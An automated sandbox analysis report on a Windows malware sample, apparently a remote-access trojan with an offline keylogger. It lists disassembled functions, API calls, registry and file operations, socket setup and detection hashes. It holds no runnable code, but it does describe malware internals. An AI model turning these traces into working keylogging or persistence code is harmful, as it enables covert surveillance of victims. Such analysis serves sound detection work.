                                                                                  control_flow_graph 1502 40966d-40967d 1503 409683-409685 1502->1503 1504 40971a-40971d 1502->1504 1505 409688-4096ae call 401ee4 CreateFileW 1503->1505 1508 4096b0-4096be GetFileSize 1505->1508 1509 4096ee 1505->1509 1510 4096c0 1508->1510 1511 4096e5-4096ec CloseHandle 1508->1511 1512 4096f1-4096f5 1509->1512 1514 4096c2-4096c8 1510->1514 1515 4096ca-4096d1 1510->1515 1511->1512 1512->1505 1513 4096f7-4096fa 1512->1513 1513->1504 1516 4096fc-409703 1513->1516 1514->1511 1514->1515 1517 4096d3-4096d5 call 40a025 1515->1517 1518 4096da-4096df Sleep 1515->1518 1516->1504 1519 409705-409715 call 408098 call 409203 1516->1519 1517->1518 1518->1511 1519->1504
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                  • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,00409745), ref: 004096E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                  • String ID: h G
                                                                                  • API String ID: 1958988193-3300504347
                                                                                  • Opcode ID: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
                                                                                  • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                                                                  • Opcode Fuzzy Hash: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
                                                                                  • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                                                                  Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1524 41a17b-41a18c 1525 41a1a4-41a1ab 1524->1525 1526 41a18e-41a191 1524->1526 1529 41a1ac-41a1c5 CreateFileW 1525->1529 1527 41a193-41a198 1526->1527 1528 41a19a-41a1a2 1526->1528 1527->1529 1528->1529 1530 41a1c7-41a1c9 1529->1530 1531 41a1cb-41a1d0 1529->1531 1534 41a209-41a20e 1530->1534 1532 41a1d2-41a1e0 SetFilePointer 1531->1532 1533 41a1eb-41a1fc WriteFile 1531->1533 1532->1533 1535 41a1e2-41a1e9 CloseHandle 1532->1535 1536 41a200-41a207 CloseHandle 1533->1536 1537 41a1fe 1533->1537 1535->1530 1536->1534 1537->1536
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,004098DF,?,00000000,00000000), ref: 0041A1D7
                                                                                  • CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A1E3
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,004098DF,?,00000000,00000000), ref: 0041A1F4
                                                                                  • CloseHandle.KERNELBASE(00000000,?,004098DF,?,00000000,00000000), ref: 0041A201
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                                  • String ID:
                                                                                  • API String ID: 1852769593-0
                                                                                  • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                                                                  • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                                                                  • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                                                                  • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                                                                  Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                  • String ID: Offline Keylogger Started
                                                                                  • API String ID: 465354869-4114347211
                                                                                  • Opcode ID: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
                                                                                  • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                                                                  • Opcode Fuzzy Hash: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
                                                                                  • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                                                                  Function 0041215F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                                                                  • RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                                                                  • RegCloseKey.ADVAPI32(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 1818849710-4028850238
                                                                                  • Opcode ID: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
                                                                                  • Instruction ID: 4e2890e51e7d784523b6c6e9c9a916a8daaabc2f4381c7e0ff06ecafce147d70
                                                                                  • Opcode Fuzzy Hash: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
                                                                                  • Instruction Fuzzy Hash: 5AF0F632100208BFCB00EFA0DD45DEE373CEF04751F104226BD09A61A2D7359E10DB94
                                                                                  Function 00411F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                                                                  • RegCloseKey.KERNELBASE(?), ref: 00411F7D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 3677997916-4028850238
                                                                                  • Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                                                                  • Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
                                                                                  • Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                                                                  • Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94
                                                                                  Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041A26F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 3919263394-0
                                                                                  • Opcode ID: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
                                                                                  • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                                                                  • Opcode Fuzzy Hash: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
                                                                                  • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                                                                  Function 00411F91 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                  • RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3677997916-0
                                                                                  • Opcode ID: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
                                                                                  • Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
                                                                                  • Opcode Fuzzy Hash: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
                                                                                  • Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8
                                                                                  Function 00412268 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412276
                                                                                  • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004,?,?,?,00410B8A,0046403C,00000000), ref: 00412291
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,?,00410B8A,0046403C,00000000), ref: 0041229C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID:
                                                                                  • API String ID: 1818849710-0
                                                                                  • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                                                                  • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                                                                  • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                                                                  • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                                                                  Function 00410EA4 Relevance: 4.5, APIs: 3, Instructions: 18synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,0000081C,00000000,00000000,00410EA3), ref: 00410EB0
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410EBB
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00410EC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleObjectOpenProcessSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 2544758360-0
                                                                                  • Opcode ID: 60aa69ad7c08f534cf4b94cb057bc0c8e050bc83634dc399482a1af0ef89919f
                                                                                  • Instruction ID: 642219cc1c95fc1f4f3b5d92cedf1a7e6d571c9fab442a487977637c770cd038
                                                                                  • Opcode Fuzzy Hash: 60aa69ad7c08f534cf4b94cb057bc0c8e050bc83634dc399482a1af0ef89919f
                                                                                  • Instruction Fuzzy Hash: 66D02E31008310BFE3A12322AC0EF9B28188F06B23F25036AF849421F24BD848C0826E
                                                                                  Function 00443649 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID: P@
                                                                                  • API String ID: 1279760036-676759640
                                                                                  • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                                  • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                                                                  • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                                  • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                                                                  Function 00443697 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 004436B8
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00430CB7,00000000,0000000F,0042D6C1,?,?,0042F768,?,?,00000000), ref: 004436F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocAllocate_free
                                                                                  • String ID:
                                                                                  • API String ID: 2447670028-0
                                                                                  • Opcode ID: 7a24a503362ce6b0d8a8277bf03f94e4b882e5a9fcc2e03a2aeb4a458e56015f
                                                                                  • Instruction ID: 1ca59af56198d509cf9e402e21e9c8c5a276ccba14ddaf673a50935c82dc1d11
                                                                                  • Opcode Fuzzy Hash: 7a24a503362ce6b0d8a8277bf03f94e4b882e5a9fcc2e03a2aeb4a458e56015f
                                                                                  • Instruction Fuzzy Hash: F0F062322012177AFB312E27AC05A6B37599F81F77F23412BF954A6391EA3CDA01456E
                                                                                  Function 0040480D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404832
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                                                                                    • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEventStartupsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1953588214-0
                                                                                  • Opcode ID: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
                                                                                  • Instruction ID: 6a7ca6a32121b389846a28cffc2ecd87dee0ffbb862a0929ff73aad7f5bc5f79
                                                                                  • Opcode Fuzzy Hash: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
                                                                                  • Instruction Fuzzy Hash: 3301B1B14087809FD7349F28B8446877FE0AB15300F048D6EF1CA93BA1D3B1A444CB18
                                                                                  Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                                  • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                                                                  • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                                  • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                                                                                  Function 0041393F Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 00413966
                                                                                    • Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                                    • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                                    • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                                    • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                                    • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                                    • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                  • String ID:
                                                                                  • API String ID: 1170566393-0
                                                                                  • Opcode ID: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                                                                  • Instruction ID: 06324504dbe977c901379e35fefec32dabdef79d564ed510376fbe661015aea4
                                                                                  • Opcode Fuzzy Hash: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                                                                  • Instruction Fuzzy Hash: FFD02B723001213B9310AB5DAC01FB76B9CDFD27227050037F409C3110D7948D4147AD
                                                                                  Function 00408F1F Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00408F39
                                                                                    • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                                                                    • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                                                                    • Part of subcall function 00409203: CreateThread.KERNELBASE(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1119755333-0
                                                                                  • Opcode ID: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
                                                                                  • Instruction ID: bde1965b6f08766bd400bb9d626b3f4fd5e121562736213e95ba31f4244dc5e2
                                                                                  • Opcode Fuzzy Hash: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
                                                                                  • Instruction Fuzzy Hash: 86218F719040899ACB09FFB5DD528EE7BB5AE51308F00003FF941722E2DE785A49DA99
                                                                                  Function 0044D2B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046
                                                                                  • _free.LIBCMT ref: 0044D320
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                                                                                  • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
                                                                                  • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                                                                                  • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738
                                                                                  Function 00443005 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000), ref: 00443046
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                                                                  • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                                                                                  • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                                                                  • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD
                                                                                  Function 0040487E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Startup
                                                                                  • String ID:
                                                                                  • API String ID: 724789610-0
                                                                                  • Opcode ID: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
                                                                                  • Instruction ID: a9c8eddc0db4f5dff40e6a71866b0cfb015b1534c728beba927ba249e589f683
                                                                                  • Opcode Fuzzy Hash: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
                                                                                  • Instruction Fuzzy Hash: C2D0123255860C4ED610ABB4AD0F8A5775CC313A16F4003BAACB9835D3F640571CC2AB
                                                                                  Function 00424A7D Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: send
                                                                                  • String ID:
                                                                                  • API String ID: 2809346765-0
                                                                                  • Opcode ID: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
                                                                                  • Instruction ID: 7b6f63586de962cf13c642be8f044126cb3c52731424b67aaf056de8313b57d0
                                                                                  • Opcode Fuzzy Hash: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
                                                                                  • Instruction Fuzzy Hash: 41B092B9108302BFCA160B60CC0887A7EA6ABC8786B00882CF546421B0C636C460AB2A

                                                                                  Non-executed Functions

                                                                                  Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                                                                    • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                                                                    • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                                                                    • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
